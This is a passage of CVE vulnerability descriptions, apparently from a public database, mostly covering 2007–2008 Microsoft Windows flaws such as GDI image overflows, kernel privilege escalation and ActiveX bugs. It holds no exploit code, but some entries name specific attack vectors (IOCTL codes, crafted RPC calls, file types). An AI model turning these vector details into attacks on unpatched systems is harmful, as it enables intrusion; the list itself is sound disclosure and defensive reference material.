as demonstrated by backrush, aka "SMB Credential Reflection Vulnerability." NOTE: some reliable sources report that this vulnerability exists because of an insufficient fix for CVE-2000-0834. [CVE-2008-4036] Integer overflow in Memory Manager in Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows local users to gain privileges via a crafted application that triggers an erroneous decrement of a variable, related to validation of parameters for Virtual Address Descriptors (VADs) and a "memory allocation mapping error," aka "Virtual Address Descriptor Elevation of Privilege Vulnerability." [CVE-2008-4023] Active Directory in Microsoft Windows 2000 SP4 does not properly allocate memory for (1) LDAP and (2) LDAPS requests, which allows remote attackers to execute arbitrary code via a crafted request, aka "Active Directory Overflow Vulnerability." [CVE-2008-3957] The Microsoft Windows Image Acquisition Logger ActiveX control allows remote attackers to force the download of arbitrary files onto a client system via a URL in the first argument to the Open method, in conjunction with a full destination pathname in the first argument to the Save method. NOTE: the provenance of this information is unknown [CVE-2008-3893] Microsoft Bitlocker in Windows Vista before SP1 stores pre-boot authentication passwords in the BIOS Keyboard buffer and does not clear this buffer during boot, which allows local users to obtain sensitive information by reading the physical memory locations associated with this buffer. [CVE-2008-3815] Unspecified vulnerability in Cisco Adaptive Security Appliances (ASA) 5500 Series and PIX Security Appliances 7.0 before 7.0(8)3, 7.1 before 7.1(2)78, 7.2 before 7.2(4)16, 8.0 before 8.0(4)6, and 8.1 before 8.1(1)13, when configured as a VPN using Microsoft Windows NT Domain authentication, allows remote attackers to bypass VPN authentication via unknown vectors. [CVE-2008-3648] nslookup.exe in Microsoft Windows XP SP2 allows user-assisted remote attackers to execute arbitrary code, as demonstrated by an attempted DNS zone transfer, and as exploited in the wild in August 2008. [CVE-2008-3636] Integer overflow in the IopfCompleteRequest API in the kernel in Microsoft Windows 2000, XP, Server 2003, and Vista allows context-dependent attackers to gain privileges. NOTE: this issue was originally reported for GEARAspiWDM.sys 2.0.7.5 in Gear Software CD DVD Filter driver before 4.001.7, as used in other products including Apple iTunes and multiple Symantec and Norton products, which allows local users to gain privileges via repeated IoAttachDevice IOCTL calls to \\.\GEARAspiWDMDevice in this GEARAspiWDM.sys. However, the root cause is the integer overflow in the API call itself. [CVE-2008-3479] Heap-based buffer overflow in the Microsoft Message Queuing (MSMQ) service (mqsvc.exe) in Microsoft Windows 2000 SP4 allows remote attackers to read memory contents and execute arbitrary code via a crafted RPC call, related to improper processing of parameters to string APIs, aka "Message Queuing Service Remote Code Execution Vulnerability." [CVE-2008-3465] Heap-based buffer overflow in an API in GDI in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows context-dependent attackers to cause a denial of service or execute arbitrary code via a WMF file with a malformed file-size parameter, which would not be properly handled by a third-party application that uses this API for a copy operation, aka "GDI Heap Overflow Vulnerability." [CVE-2008-3464] afd.sys in the Ancillary Function Driver (AFD) component in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP1 and SP2 does not properly validate input sent from user mode to the kernel, which allows local users to gain privileges via a crafted application, as demonstrated using crafted pointers and lengths that bypass intended ProbeForRead and ProbeForWrite restrictions, aka "AFD Kernel Overwrite Vulnerability." [CVE-2008-3068] Microsoft Crypto API 5.131.2600.2180 through 6.0, as used in Outlook, Windows Live Mail, and Office 2007, performs Certificate Revocation List (CRL) checks by using an arbitrary URL from a certificate embedded in a (1) S/MIME e-mail message or (2) signed document, which allows remote attackers to obtain reading times and IP addresses of recipients, and port-scan results, via a crafted certificate with an Authority Information Access (AIA) extension. [CVE-2008-3014] Buffer overflow in gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed WMF image file that triggers improper memory allocation, aka "GDI+ WMF Buffer Overrun Vulnerability." [CVE-2008-3013] gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed GIF image file containing many extension markers for graphic control extensions and subsequent unknown labels, aka "GDI+ GIF Parsing Vulnerability." [CVE-2008-3012] gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 does not properly perform memory allocation, which allows remote attackers to execute arbitrary code via a malformed EMF image file, aka "GDI+ EMF Memory Corruption Vulnerability." [CVE-2008-3010] Microsoft Windows Media Player 6.4, Windows Media Format Runtime 7.1 through 11, and Windows Media Services 4.1 and 9 incorrectly associate ISATAP addresses with the Local Intranet zone, which allows remote servers to capture NTLM credentials, and execute arbitrary code through credential-reflection attacks, by sending an authentication request, aka "ISATAP Vulnerability." [CVE-2008-3009] Microsoft Windows Media Player 6.4, Windows Media Format Runtime 7.1 through 11, and Windows Media Services 4.1, 9, and 2008 do not properly use the Service Principal Name (SPN) identifier when validating replies to authentication requests, which allows remote servers to execute arbitrary code via vectors that employ NTLM credential reflection, aka "SPN Vulnerability." [CVE-2008-3008] Stack-based buffer overflow in the WMEncProfileManager ActiveX control in wmex.dll in Microsoft Windows Media Encoder 9 Series allows remote attackers to execute arbitrary code via a long first argument to the GetDetailsString method, aka "Windows Media Encoder Buffer Overrun Vulnerability." [CVE-2008-2547] Stack-based buffer overflow in msiexec.exe 3.1.4000.1823 and 4.5.6001.22159 in Microsoft Windows Installer allows context-dependent attackers to execute arbitrary code via a long GUID value for the /x (aka /uninstall) option. NOTE: this issue might cross privilege boundaries if msiexec.exe is reachable via components such as ActiveX controls, and might additionally require a separate vulnerability in the control. [CVE-2008-2540] Apple Safari on Mac OS X, and before 3.1.2 on Windows, does not prompt the user before downloading an object that has an unrecognized content type, which allows remote attackers to place malware into the (1) Desktop directory on Windows or (2) Downloads directory on Mac OS X, and subsequently allows remote attackers to execute arbitrary code on Windows by leveraging an untrusted search path vulnerability in (a) Internet Explorer 7 on Windows XP or (b) the SearchPath function in Windows XP, Vista, and Server 2003 and 2008, aka a "Carpet Bomb" and a "Blended Threat Elevation of Privilege Vulnerability," a different issue than CVE-2008-1032. NOTE: Apple considers this a vulnerability only because the Microsoft products can load application libraries from the desktop and, as of 20080619, has not covered the issue in an advisory for Mac OS X. [CVE-2008-2253] Unspecified vulnerability in Microsoft Windows Media Player 11 allows remote attackers to execute arbitrary code via a crafted audio-only file that is streamed from a Server-Side Playlist (SSPL) on Windows Media Server, aka "Windows Media Player Sampling Rate Vulnerability." [CVE-2008-2252] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate parameters sent from user mode to the kernel, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Memory Corruption Vulnerability." [CVE-2008-2251] Double free vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows local users to gain privileges via a crafted application that makes system calls within multiple threads, aka "Windows Kernel Unhandled Exception Vulnerability." NOTE: according to Microsoft, this is not a duplicate of CVE-2008-4510. [CVE-2008-2250] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate window properties sent from a parent window to a child window during creation of a new window, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Window Creation Vulnerability." [CVE-2008-2249] Integer overflow in GDI in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via a malformed header in a crafted WMF file, which triggers a buffer overflow, aka "GDI Integer Overflow Vulnerability." [CVE-2008-2246] Microsoft Windows Vista through SP1 and Server 2008 do not properly import the default IPsec policy from a Windows Server 2003 domain to a Windows Server 2008 domain, which prevents IPsec rules from being enforced and allows remote attackers to bypass intended access restrictions. [CVE-2008-2245] Heap-based buffer overflow in the InternalOpenColorProfile function in mscms.dll in Microsoft Windows Image Color Management System (MSCMS) in the Image Color Management (ICM) component on Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted image file. [CVE-2008-2160] Multiple unspecified vulnerabilities in the JPEG (GDI+) and GIF image processing in Microsoft Windows CE 5.0 allow remote attackers to execute arbitrary code via crafted (1) JPEG and (2) GIF images. [CVE-2008-1888] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 2.0 allows remote attackers to inject arbitrary web script or HTML via the Picture Source (aka picture object source) field in the Rich Text Editor. [CVE-2008-1457] The Event System in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate per-user subscriptions, which allows remote authenticated users to execute arbitrary code via a crafted event subscription request. [CVE-2008-1456] Array index vulnerability in the Event System in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote authenticated users to execute arbitrary code via a crafted event subscription request that is used to access an array of function pointers. [CVE-2008-1454] Unspecified vulnerability in Microsoft DNS in Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008 allows remote attackers to conduct cache poisoning attacks via unknown vectors related to accepting "records from a response that is outside the remote server's authority," aka "DNS Cache Poisoning Vulnerability," a different vulnerability than CVE-2008-1447. [CVE-2008-1453] The Bluetooth stack in Microsoft Windows XP SP2 and SP3, and Vista Gold and SP1, allows physically proximate attackers to execute arbitrary code via a large series of Service Discovery Protocol (SDP) packets. [CVE-2008-1451] The WINS service on Microsoft Windows 2000 SP4, and Server 2003 SP1 and SP2, does not properly validate data structures in WINS network packets, which allows local users to gain privileges via a crafted packet, aka "Memory Overwrite Vulnerability." [CVE-2008-1448] The MHTML protocol handler in a component of Microsoft Outlook Express 5.5 SP2 and 6 through SP1, and Windows Mail, does not assign the correct Internet Explorer Security Zone to UNC share pathnames, which allows remote attackers to bypass intended access restrictions and read arbitrary files via an mhtml: URI in conjunction with a redirection, aka "URL Parsing Cross-Domain Information Disclosure Vulnerability." [CVE-2008-1446] Integer overflow in the Internet Printing Protocol (IPP) ISAPI extension in Microsoft Internet Information Services (IIS) 5.0 through 7.0 on Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to execute arbitrary code via an HTTP POST request that triggers an outbound IPP connection from a web server to a machine operated by the attacker, aka "Integer Overflow in IPP Service Vulnerability." [CVE-2008-1445] Active Directory on Microsoft Windows 2000 Server SP4, XP Professional SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to cause a denial of service (system hang or reboot) via a crafted LDAP request. [CVE-2008-1444] Stack-based buffer overflow in Microsoft DirectX 7.0 and 8.1 on Windows 2000 SP4 allows remote attackers to execute arbitrary code via a Synchronized Accessible Media Interchange (SAMI) file with crafted parameters for a Class Name variable, aka the "SAMI Format Parsing Vulnerability." [CVE-2008-1441] Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system hang) via a series of Pragmatic General Multicast (PGM) packets with invalid fragment options, aka the "PGM Malformed Fragment Vulnerability." [CVE-2008-1440] Microsoft Windows XP SP2 and SP3, and Server 2003 SP1 and SP2, does not properly validate the option length field in Pragmatic General Multicast (PGM) packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted PGM packet, aka the "PGM Invalid Length Vulnerability." [CVE-2008-1436] Microsoft Windows XP Professional SP2, Vista, and Server 2003 and 2008 does not properly assign activities to the (1) NetworkService and (2) LocalService accounts, which might allow context-dependent attackers to gain privileges by using one service process to capture a resource from a second service process that has a LocalSystem privilege-escalation ability, related to improper management of the SeImpersonatePrivilege user right, as originally reported for Internet Information Services (IIS), aka Token Kidnapping. [CVE-2008-1435] Windows Explorer in Microsoft Windows Vista up to SP1, and Server 2008, allows user-assisted remote attackers to execute arbitrary code via crafted saved-search (.search-ms) files that are not properly handled when saving, aka "Windows Saved Search Vulnerability." [CVE-2008-1087] Stack-based buffer overflow in GDI in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, and Server 2008 allows remote attackers to execute arbitrary code via an EMF image file with crafted filename parameters, aka "GDI Stack Overflow Vulnerability." [CVE-2008-1086] The HxTocCtrl ActiveX control (hxvz.dll), as used in Microsoft Internet Explorer 5.01 SP4 and 6 SP1, in Windows XP SP2, Server 2003 SP1 and SP2, Vista SP1, and Server 2008, allows remote attackers to execute arbitrary code via malformed arguments, which triggers memory corruption. [CVE-2008-1084] Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, through Vista SP1, and Server 2008 allows local users to execute arbitrary code via unknown vectors related to improper input validation. NOTE: it was later reported that one affected function is NtUserFnOUTSTRING in win32k.sys. [CVE-2008-1083] Heap-based buffer overflow in the CreateDIBPatternBrushPt function in GDI in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, and Server 2008 allows remote attackers to execute arbitrary code via an EMF or WMF image file with a malformed header that triggers an integer overflow, aka "GDI Heap Overflow Vulnerability." [CVE-2008-0951] Microsoft Windows Vista does not properly enforce the NoDriveTypeAutoRun registry value, which allows user-assisted remote attackers, and possibly physically proximate attackers, to execute arbitrary code by inserting a (1) CD-ROM device or (2) U3-enabled USB device containing a filesystem with an Autorun.inf file, and possibly other vectors related to (a) AutoRun and (b) AutoPlay actions. [CVE-2008-0322] The I2O Utility Filter driver (i2omgmt.sys) 5.1.2600.2180 for Microsoft Windows XP sets Everyone/Write permissions for the "\\.\I2OExc" device interface, which allows local users to gain privileges. NOTE: this issue can be leveraged to overwrite arbitrary memory and execute code via an IOCTL call with a crafted DeviceObject pointer. [CVE-2008-0088] Unspecified vulnerability in Active Directory on Microsoft Windows 2000 and Windows Server 2003, and Active Directory Application Mode (ADAM) on XP and Server 2003, allows remote attackers to cause a denial of service (hang and restart) via a crafted LDAP request. [CVE-2008-0087] The DNS client in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, and Vista uses predictable DNS transaction IDs, which allows remote attackers to spoof DNS responses. [CVE-2008-0084] Unspecified vulnerability in the TCP/IP support in Microsoft Windows Vista allows remote DHCP servers to cause a denial of service (hang and restart) via a crafted DHCP packet. [CVE-2008-0083] The (1) VBScript (VBScript.dll) and (2) JScript (JScript.dll) scripting engines 5.1 and 5.6, as used in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2, do not properly decode script, which allows remote attackers to execute arbitrary code via unknown vectors. [CVE-2008-0080] Heap-based buffer overflow in the WebDAV Mini-Redirector in Microsoft Windows XP SP2, Server 2003 SP1 and SP2, and Vista allows remote attackers to execute arbitrary code via a crafted WebDAV response. [CVE-2008-0020] Unspecified vulnerability in the Load method in the IPersistStreamInit interface in the Active Template Library (ATL), as used in the Microsoft Video ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via unknown vectors that trigger memory corruption, aka "ATL Header Memcopy Vulnerability," a different vulnerability than CVE-2008-0015. [CVE-2008-0015] Stack-based buffer overflow in the CComVariant::ReadFromStream function in the Active Template Library (ATL), as used in the MPEG2TuneRequest ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted web page, as exploited in the wild in July 2009, aka "Microsoft Video ActiveX Control Vulnerability." [CVE-2007-6753] Untrusted search path vulnerability in Shell32.dll in Microsoft Windows 2000, Windows XP, Windows Vista, Windows Server 2008, and Windows 7, when using an environment configured with a string such as %APPDATA% or %PROGRAMFILES% in a certain way, allows local users to gain privileges via a Trojan horse DLL under the current working directory, as demonstrated by iTunes and Safari. [CVE-2007-6401] Stack-based buffer overflow in mplayer2.exe in Microsoft Windows Media Player (WMP) 6.4, when used with the 3ivx 4.5.1 or 5.0.1 codec, allows remote attackers to execute arbitrary code via a certain .mp4 file, possibly a related issue to CVE-2007-6402. [CVE-2007-6332] The HPInfoDLL.HPInfo.1 ActiveX control in HPInfoDLL.dll 1.0, as shipped with HP Info Center (hpinfocenter.exe) 1.0.1.1 in HP Quick Launch Button (QLBCTRL.exe, aka QLB) 6.3 and earlier, on Microsoft Windows before Vista allows remote attackers to create or modify arbitrary registry values via the arguments to the SetRegValue method. [CVE-2007-6236] Microsoft Windows Media Player (WMP) allows remote attackers to cause a denial of service (application crash) via a certain AIFF file that triggers a divide-by-zero error, as demonstrated by kr.aiff. [CVE-2007-6043] The CryptGenRandom function in Microsoft Windows 2000 generates predictable values, which makes it easier for context-dependent attackers to reduce the effectiveness of cryptographic mechanisms, as demonstrated by attacks on (1) forward security and (2) backward security, related to use of eight instances of the RC4 cipher, and possibly a related issue to CVE-2007-3898. [CVE-2007-5634] Speedfan.sys in Alfredo Milani Comparetti SpeedFan 4.33, when used on Microsoft Windows Vista x64, does not properly check a buffer during an IOCTL 0x9c402420 call, which allows local users to cause a denial of service (machine crash) and possibly gain privileges via unspecified vectors. [CVE-2007-5633] Speedfan.sys in Alfredo Milani Comparetti SpeedFan 4.33, when used on Microsoft Windows Vista x64, allows local users to read or write arbitrary MSRs, and gain privileges and load unsigned drivers, via the (1) IOCTL_RDMSR 0x9C402438 and (2) IOCTL_WRMSR 0x9C40243C IOCTLs to \Device\speedfan, as demonstrated by an IOCTL_WRMSR action on MSR_LSTAR. [CVE-2007-5587] Buffer overflow in Macrovision SafeDisc secdrv.sys before 4.3.86.0, as shipped in Microsoft Windows XP SP2, XP Professional x64 and x64 SP2, Server 2003 SP1 and SP2, and Server 2003 x64 and x64 SP2 allows local users to overwrite arbitrary memory locations and gain privileges via a crafted argument to a METHOD_NEITHER IOCTL, as originally discovered in the wild. [CVE-2007-5460] Microsoft ActiveSync 4.1, as used in Windows Mobile 5.0, uses weak encryption (XOR obfuscation with a fixed key) when sending the user's PIN/Password over the USB connection from the host to the device, which might make it easier for attackers to decode a PIN/Password obtained by (1) sniffing or (2) spoofing the docking process. [CVE-2007-5352] Unspecified vulnerability in Local Security Authority Subsystem Service (LSASS) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2 allows local users to gain privileges via a crafted local procedure call (LPC) request. [CVE-2007-5351] Unspecified vulnerability in Server Message Block Version 2 (SMBv2) signing support in Microsoft Windows Vista allows remote attackers to force signature re-computation and execute arbitrary code via a crafted SMBv2 packet, aka "SMBv2 Signing Vulnerability." [CVE-2007-5350] Unspecified vulnerability in the Windows Advanced Local Procedure Call (ALPC) in the kernel in Microsoft Windows Vista allows local users to gain privileges via unspecified vectors involving "legacy reply paths." [CVE-2007-5348] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via an image file with crafted gradient sizes in gradient fill input, which triggers a heap-based buffer overflow related to GdiPlus.dll and VGX.DLL, aka "GDI+ VML Buffer Overrun Vulnerability." [CVE-2007-5145] Multiple buffer overflows in system DLL files in Microsoft Windows XP, as used by Microsoft Windows Explorer (explorer.exe) 6.00.2900.2180, Don Ho Notepad++, unspecified Adobe Macromedia applications, and other programs, allow user-assisted remote attackers to cause a denial of service (application crash) via long strings in the (1) author, (2) title, (3) subject, and (4) comment Properties fields of a file, possibly involving improper handling of extended file attributes by the (a) NtQueryInformationFile, (b) NtQueryDirectoryFile, (c) NtSetInformationFile, (d) FileAllInformation, (e) FileNameInformation, and other FILE_INFORMATION_CLASS functions in ntdll.dll and the (f) GetFileAttributesExW and (g) GetFileAttributesW functions in kernel32.dll, a related issue to CVE-2007-1347. [CVE-2007-5133] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service (CPU consumption) via a certain PNG file with a large tEXt chunk that possibly triggers an integer overflow in PNG chunk size handling, as demonstrated by badlycrafted.png. [CVE-2007-5095] Microsoft Windows Media Player (WMP) 9 on Windows XP SP2 invokes Internet Explorer to render HTML documents contained inside some media files, regardless of what default web browser is configured, which might allow remote attackers to exploit vulnerabilities in software that the user does not expect to run, as demonstrated by the HTMLView parameter in an .asx file. [CVE-2007-4414] Cisco VPN Client on Windows before 4.8.02.0010 allows local users to gain privileges by enabling the "Start Before Logon" (SBL) and Microsoft Dial-Up Networking options, and then interacting with the dial-up networking dialog box. [CVE-2007-4288] Microsoft Windows Media Player 11 (wmplayer.exe) allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted .au file that triggers a divide-by-zero error, as demonstrated by iapetus.au. [CVE-2007-4247] Windows Calendar on Microsoft Windows Vista allows remote attackers to cause a denial of service (NULL dereference and persistent application crash) via a malformed ICS file. [CVE-2007-4227] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service via a certain JPG file, as demonstrated by something.jpg. NOTE: this issue might be related to CVE-2007-3958. [CVE-2007-3958] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service via a certain GIF file, as demonstrated by Art.gif. [CVE-2007-3898] The DNS server in Microsoft Windows 2000 Server SP4, and Server 2003 SP1 and SP2, uses predictable transaction IDs when querying other DNS servers, which allows remote attackers to spoof DNS replies, poison the DNS cache, and facilitate further attack vectors. [CVE-2007-3897] Heap-based buffer overflow in Microsoft Outlook Express 6 and earlier, and Windows Mail for Vista, allows remote Network News Transfer Protocol (NNTP) servers to execute arbitrary code via long NNTP responses that trigger memory corruption. [CVE-2007-3896] The URL handling in Shell32.dll in the Windows shell in Microsoft Windows XP and Server 2003, with Internet Explorer 7 installed, allows remote attackers to execute arbitrary programs via invalid "%" sequences in a mailto: or other URI handler, as demonstrated using mIRC, Outlook, Firefox, Adobe Reader, Skype, and other applications. NOTE: this issue might be related to other issues involving URL handlers in Windows systems, such as CVE-2007-3845. There also might be separate but closely related issues in the applications that are invoked by the handlers. [CVE-2007-3826] Microsoft Internet Explorer 7 on Windows XP SP2 allows remote attackers to prevent users from leaving a site, spoof the address bar, and conduct phishing and other attacks via repeated document.open function calls after a user requests a new page, but before the onBeforeUnload function is called. [CVE-2007-3724] The process scheduler in the Microsoft Windows XP kernel does not make use of the process statistics kept by the kernel, performs scheduling based on CPU billing gathered from periodic process sampling ticks, and gives preference to "interactive" processes that perform voluntary sleeps, which allows local users to cause a denial of service (CPU consumption), as described in "Secretly Monopolizing the CPU Without Superuser Privileges." [CVE-2007-3671] Unspecified vulnerability in the kernel in Microsoft Windows Vista has unspecified remote attack vectors and impact, as shown in the "0day IPO" presentation at SyScan'07. [CVE-2007-3463] DISPUTED Microsoft Windows XP SP2 allows local users, who have sessions created by another user's RunAs (run as) command, to kill arbitrary processes of this other user, as demonstrated by the taskkill program. NOTE: the researcher claims a vendor dispute in which the vendor states that "RunAs and UAC are convenience features, not security boundaries. If you need a security guarantee, please log out and log back in with a different account." [CVE-2007-3436] Microsoft MSN Messenger 4.7 on Windows XP allows remote attackers to cause a denial of service (resource consumption) via a flood of SIP INVITE requests to the port specified for voice conversation. [CVE-2007-3406] Multiple absolute path traversal vulnerabilities in Microsoft Internet Explorer 6 on Windows XP SP2 allow remote attackers to access arbitrary local files via the file: URI in the (1) src attribute of a (a) bgsound, (b) input, (c) EMBED, (d) img, or (e) script tag [CVE-2007-3300] Multiple F-Secure anti-virus products for Microsoft Windows and Linux before 20070619 allow remote attackers to bypass scanning via a crafted header in a (1) LHA or (2) RAR archive. [CVE-2007-3040] Stack-based buffer overflow in agentdpv.dll 2.0.0.3425 in Microsoft Agent on Windows 2000 SP4 allows remote attackers to execute arbitrary code via a crafted URL to the Agent (Agent.Control) ActiveX control, which triggers an overflow within the Agent Service (agentsrv.exe) process, a different issue than CVE-2007-1205. [CVE-2007-3039] Stack-based buffer overflow in the Microsoft Message Queuing (MSMQ) service in Microsoft Windows 2000 Server SP4, Windows 2000 Professional SP4, and Windows XP SP2 allows attackers to execute arbitrary code via a long string in an opnum 0x06 RPC call to port 2103. NOTE: this is remotely exploitable on Windows 2000 Server. [CVE-2007-3038] The Teredo interface in Microsoft Windows Vista and Vista x64 Edition does not properly handle certain network traffic, which allows remote attackers to bypass firewall blocking rules and obtain sensitive information via crafted IPv6 traffic, aka "Windows Vista Firewall Blocking Rule Information Disclosure Vulnerability." [CVE-2007-3037] Microsoft Windows Media Player 7.1, 9, 10, and 11 allows remote attackers to execute arbitrary code via a skin file (WMZ or WMD) with crafted header information that causes a size mismatch between compressed and decompressed data and triggers a heap-based buffer overflow, aka "Windows Media Player Code Execution Vulnerability Parsing Skins." [CVE-2007-3036] Unspecified vulnerability in the (1) Windows Services for UNIX 3.0 and 3.5, and (2) Subsystem for UNIX-based Applications in Microsoft Windows 2000, XP, Server 2003, and Vista allows local users to gain privileges via unspecified vectors related to "certain setuid binary files." [CVE-2007-3035] Unspecified vulnerability in Microsoft Windows Media Player 7.1, 9, 10, and 11 allows remote attackers to execute arbitrary code via a skin file (WMZ or WMD) with crafted header information that is not properly handled during decompression, aka "Windows Media Player Code Execution Vulnerability Decompressing Skins." [CVE-2007-3034] Integer overflow in the AttemptWrite function in Graphics Rendering Engine (GDI) on Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted metafile (image) with a large record length value, which triggers a heap-based buffer overflow. [CVE-2007-3028] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4 does not properly check "the number of convertible attributes", which allows remote attackers to cause a denial of service (service unavailability) via a crafted LDAP request, related to "client sent LDAP request logic," aka "Windows Active Directory Denial of Service Vulnerability". NOTE: this is probably a different issue than CVE-2007-0040. [CVE-2007-2999] Microsoft Windows Server 2003, when time restrictions are in effect for user accounts, generates different error messages for failed login attempts with a valid user name than for those with an invalid user name, which allows context-dependent attackers to determine valid Active Directory account names. [CVE-2007-2967] Multiple F-Secure anti-virus products for Microsoft Windows and Linux before 20070522 allow remote attackers to cause a denial of service (file scanning infinite loop) via certain crafted (1) ARJ archives or (2) FSG packed files. [CVE-2007-2966] Buffer overflow in the LHA decompresion component in F-Secure anti-virus products for Microsoft Windows and Linux before 20070529 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted LHA archive, related to an integer wrap, a similar issue to CVE-2006-4335. [CVE-2007-2815] The "hit-highlighting" functionality in webhits.dll in Microsoft Internet Information Services (IIS) Web Server 5.0 only uses Windows NT ACL configuration, which allows remote attackers to bypass NTLM and basic authentication mechanisms and access private web directories via the CiWebhitsfile parameter to null.htw. [CVE-2007-2730] Check Point ZoneAlarm Pro before 6.5.737.000 does not properly test for equivalence of process identifiers for certain Microsoft Windows API functions in the NT kernel 5.0 and greater, which allows local users to call these functions, and bypass firewall rules or gain privileges, via a modified identifier that is one, two, or three greater than the canonical identifier. [CVE-2007-2729] Comodo Firewall Pro 2.4.18.184 and Comodo Personal Firewall 2.3.6.81, and probably older Comodo Firewall versions, do not properly test for equivalence of process identifiers for certain Microsoft Windows API functions in the NT kernel 5.0 and greater, which allows local users to call these functions, and bypass firewall rules or gain privileges, via a modified identifier that is one, two, or three greater than the canonical identifier. [CVE-2007-2593] The Terminal Server in Microsoft Windows 2003 Server, when using TLS, allows remote attackers to bypass SSL and self-signed certificate requirements, downgrade the server security, and possibly conduct man-in-the-middle attacks via unspecified vectors, as demonstrated using the Remote Desktop Protocol (RDP) 6.0 client. NOTE: a third party claims that the vendor may have fixed this in approximately 2006. [CVE-2007-2581] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft Windows SharePoint Services 3.0 for Windows Server 2003 and Office SharePoint Server 2007 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO (query string) in "every main page," as demonstrated by default.aspx. [CVE-2007-2374] Unspecified vulnerability in Microsoft Windows 2000, XP, and Server 2003 allows user-assisted remote attackers to execute arbitrary code via unspecified vectors. NOTE: this information is based upon a vague pre-advisory with no actionable information. However, the advisory is from a reliable source. [CVE-2007-2237] Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) allows context-dependent attackers to cause a denial of service (crash) via an ICO file with an InfoHeader containing a Height of zero, which triggers a divide-by-zero error. [CVE-2007-2229] Microsoft Windows Vista uses insecure default permissions for unspecified "local user information data stores" in the registry and the file system, which allows local users to obtain sensitive information such as administrative passwords, aka "Permissive User Information Store ACLs Information Disclosure 